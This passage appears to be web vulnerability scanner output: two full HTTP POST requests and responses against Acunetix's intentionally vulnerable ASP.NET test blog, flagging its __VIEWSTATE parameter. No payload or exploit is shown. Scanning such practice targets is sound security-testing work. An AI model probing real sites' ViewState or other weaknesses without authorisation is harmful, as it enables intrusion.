href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:White" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8125&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAAN2apEtoIZGRklorD%2F%2FcZPNer00YuHR%2FoX5slD2Y%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL11IjhCAKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDErlSakwbSwf%2BYfaX8qmN%2BdFcET3
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:36 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAAN2apEtoIZGRklorD//cZPNer00YuHR/oX5slD2Y=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL11IjhCAKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDErlSakwbSwf+YfaX8qmN+dFcET3" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:White" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8140&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAaeJyHtoIZGRkUxZCQj7%2FVoRQUjsdiGcGpjSlFVQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKjmvjCBwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDOL4Kn6C8z8DaAqLeh3zzAQdd2Id
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:12 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAaeJyHtoIZGRkUxZCQj7/VoRQUjsdiGcGpjSlFVQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKjmvjCBwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDOL4Kn6C8z8DaAqLeh3zzAQdd2Id" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 